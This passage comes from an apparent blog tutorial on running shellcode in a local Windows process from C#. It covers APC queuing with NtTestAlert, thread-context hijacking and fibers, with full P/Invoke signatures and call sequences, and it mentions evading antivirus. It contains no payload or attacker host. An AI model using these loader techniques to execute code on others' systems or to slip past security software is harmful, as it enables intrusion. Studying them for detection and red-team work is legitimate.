IntPtr ptr = QueueUserAPC(rwxMemory, pt, IntPtr.Zero);
Lastly we call NtTestAlert to make the calling thread empty it’s APC queue and run the APC objects (including our shellcode APC object). The P/Invoke signature for NtTestAlert is:
[DllImport("ntdll.dll", SetLastError = true)]
public static extern IntPtr NtTestAlert();
Then we call it (finally executing our shellcode):
NtTestAlert();
LocalThread Highjacking
In the very first example, a thread was created that specifically pointed to the shellcode and executed on creation. Instead we can create a thread, then in a later step change what instruction its running (or will run) by manipulating its Instruction Pointer to instead point to the first instruction in our shellcode. Why would we do this? It allows you to perform essentially the same action in extra steps (which can sometimes bypass AV) but mainly its a remote process injection technique that can be applied to a local process.
To do this, we first create a thread in a “suspended” state by using the CreateThread API (as used above):
IntPtr hThread = CreateThread(IntPtr.Zero, 0, IntPtr.Zero, IntPtr.Zero, 0x00000004, out hThread);
The only difference in this call to the original shell code runner, is we pass 0x00000004 (CREATE_SUSPENDED) in the dwCreationFlag’s argument (as apposed to 0 for run immediately).
Next we want to obtain the thread’s “context”. This is a structure of type CONTEXT, which contains information such as register values for the thread. We do this because we only want to modify the Instruction Pointer register, while allowing the thread to still run without issue, by keeping the rest of its context unmodified.
The thread’s context can be obtained with the Win32 API GetThreadContext, which takes a handle to a thread, and a pointer to a CONTEXT structure, and populates the CONTEXT structure with the threads context. The P/Invoke signature can be found here, and for this is:
public enum CONTEXT_FLAGS : uint
{
CONTEXT_i386 = 0x10000,
CONTEXT_i486 = 0x10000, // same as i386
CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP
CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI
CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS
CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state
CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7
CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions
CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS
}
[StructLayout(LayoutKind.Sequential)]
public struct FLOATING_SAVE_AREA
{
public uint ControlWord;
public uint StatusWord;
public uint TagWord;
public uint ErrorOffset;
public uint ErrorSelector;
public uint DataOffset;
public uint DataSelector;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] RegisterArea;
public uint Cr0NpxState;
}
[StructLayout(LayoutKind.Sequential)]
public struct CONTEXT
{
public uint ContextFlags;
public uint Dr0;
public uint Dr1;
public uint Dr2;
public uint Dr3;
public uint Dr6;
public uint Dr7;
// Retrieved by CONTEXT_FLOATING_POINT
public FLOATING_SAVE_AREA FloatSave;
// Retrieved by CONTEXT_SEGMENTS
public uint SegGs;
public uint SegFs;
public uint SegEs;
public uint SegDs;
// Retrieved by CONTEXT_INTEGER
public uint Edi;
public uint Esi;
public uint Ebx;
public uint Edx;
public uint Ecx;
public uint Eax;
// Retrieved by CONTEXT_CONTROL
public uint Ebp;
public uint Eip;
public uint SegCs;
public uint EFlags;
public uint Esp;
public uint SegSs;
// Retrieved by CONTEXT_EXTENDED_REGISTERS
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] ExtendedRegisters;
}
// Next x64
[StructLayout(LayoutKind.Sequential)]
public struct M128A
{
public ulong High;
public long Low;
public override string ToString()
{
return string.Format("High:{0}, Low:{1}", this.High, this.Low);
}
}
/// <summary>
/// x64
/// </summary>
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct XSAVE_FORMAT64
{
public ushort ControlWord;
public ushort StatusWord;
public byte TagWord;
public byte Reserved1;
public ushort ErrorOpcode;
public uint ErrorOffset;
public ushort ErrorSelector;
public ushort Reserved2;
public uint DataOffset;
public ushort DataSelector;
public ushort Reserved3;
public uint MxCsr;
public uint MxCsr_Mask;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public M128A[] FloatRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public M128A[] XmmRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
public byte[] Reserved4;
}
/// <summary>
/// x64
/// </summary>
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct CONTEXT64
{
public ulong P1Home;
public ulong P2Home;
public ulong P3Home;
public ulong P4Home;
public ulong P5Home;
public ulong P6Home;
public CONTEXT_FLAGS ContextFlags;
public uint MxCsr;
public ushort SegCs;
public ushort SegDs;
public ushort SegEs;
public ushort SegFs;
public ushort SegGs;
public ushort SegSs;
public uint EFlags;
public ulong Dr0;
public ulong Dr1;
public ulong Dr2;
public ulong Dr3;
public ulong Dr6;
public ulong Dr7;
public ulong Rax;
public ulong Rcx;
public ulong Rdx;
public ulong Rbx;
public ulong Rsp;
public ulong Rbp;
public ulong Rsi;
public ulong Rdi;
public ulong R8;
public ulong R9;
public ulong R10;
public ulong R11;
public ulong R12;
public ulong R13;
public ulong R14;
public ulong R15;
public ulong Rip;
public XSAVE_FORMAT64 DUMMYUNIONNAME;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
public M128A[] VectorRegister;
public ulong VectorControl;
public ulong DebugControl;
public ulong LastBranchToRip;
public ulong LastBranchFromRip;
public ulong LastExceptionToRip;
public ulong LastExceptionFromRip;
}
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
Ok, so you might notice this is a much bigger P/Invoke signature, it’s not only the signature but also this other stuff. This API call requires us to pass a pointer to a CONTEXT structure (in our case we are assuming we are running on 64 bit, so CONTEXT64), but C# does not have a CONTEXT data type, and there is no direct translation that we can use like in other cases. Instead we have to manually define the structure itself (public struct CONTEXT64), with all the fields that make up the structure (performing the same type translation as done with earlier P/Invoke signatures).
One specific thing to note is the ContextFlag value within the CONTEXT structure when calling GetThreadContext is used to control what values are filled out within the pass structure. For example this could be used to only return debug register values. In our case we want all values, so we want to set this to the CONTEXT_ALL value. These values can be found here(under constants).
Now we can then create a CONTEXT64 object, sets its context flag to all and pass a pointer to this object (via the ref keyword) to a call to the GetThreadContext Win32 API, passing in the handle of the newly created thread.
CONTEXT64 ctx64 = new CONTEXT64();
ctx64.ContextFlags = CONTEXT_FLAGS.CONTEXT_ALL;
GetThreadContext(hThread, ref ctx64);
Awesome, at this point the CONTEXT64 object we created should be first change the value of the Instruction Pointer register (RIP) to point to our shellcode (within thw RWX region), and use another Win32 API SetThreadContext, to set the context of the newly created thread to our CONTEXT64 object. The P/Invoke signature for SetThreadContext is:
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
It takes the same parameters as GetThreadContext but does the opposite action (setting the context to the values of the passed in pointer to a CONTEXT struct). Now we change the RIP value and set the threads context:
ctx64.Rip = (ulong)rwxMemory;
SetThreadContext(hThread, ref ctx64);
At this point, we now have a thread that if run will execute our shellcode. So how do we run this suspended thread? Via the Win32 API call ResumeThread, which takes a handle to a thread in a suspended state and will resume its execution (specifically it decrements the suspended count, which when this reaches 0, the thread will resume execution). The P/Invoke signature for this call is:
[DllImport("kernel32.dll", SetLastError = true)]
public static extern uint ResumeThread(IntPtr hThread);
When we call this Win32 API we will have the same issue as with the original shellcode runner, that is we need to call WaitForSingleObject. Therefore to resume the thread, and wait for it to execute we call:
ResumeThread(hThread);
WaitForSingleObject(hThread, 0xFFFFFFFF);
Fibers
A Fiber is a specific unit of execution that needs to be manually scheduled to run. You can think of a fiber as a specific piece of memory intended to be executed, that a thread can schedule to run. A special note is that only a fiber can schedule another fiber. We can however convert a thread into a fiber. This means we can create a fiber, that runs our shellcode, and schedule it to run by converting our main thread into a fiber.
First we convert the main thread into a fiber by calling the Win32 API ConvertThreadToFiber. This converts the calling thread into a fiber. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
static extern IntPtr ConvertThreadToFiber(IntPtr lpParameter);
The only argument to this a pointer to a variable that the fiber can then read (sort of like a parameter). We won’t be using this so we can just pass a NULL pointer (IntPtr.Zero). The return value for this call is the address of the fiber that was just created from converting the thread. Therefore we call:
IntPtr fiberAddress = ConvertThreadToFiber(IntPtr.Zero);
Next we need to create a fiber that will run our shellcode. To do this we use the CreateFiber Win32 API function. This function creates a new fiber, that when run will execute the code we pass in as a pointer. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
static extern IntPtr CreateFiber(uint dwStackSize,IntPtr lpStartAddress, IntPtr lpParameter);
The first argument allows specifying the size of the stack. For our case, we don’t care, so we pass in 0 to make it use the process default. The next argument is a pointer to the memory location (technically to a FIBER_START_ROUTINE) containing the code we want to run (in our case, we pass in the RWX memory location of the shellcode). The third is a pointer to the parameter we want to pass to the fiber. In our case, we aren’t passing parameters so we just set this to a NULL pointer (IntPtr.Zero). The return from this call is a pointer to the new fiber.
Therefore, we create a new fiber by running:
IntPtr shellCodeFiber = CreateFiber(0, rwxMemory, IntPtr.Zero);
And lastly, we execute the newly created fiber by running the Win32 API call SwitchToFiber, which schedules a fiber to execute. This function must be called from a fiber, hence why we went to the effort of switching the main thread to a fiber. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
static extern void SwitchToFiber(IntPtr fiber);
Which takes an argument to the address of the fiber to execute, which in our case is the shellcode running fiber we just created. Therefore we finally execute the fiber by running:
SwitchToFiber(shellCodeFiber);
GitHub link
All of the above techniques have been combined into one POC on my GitHub, located here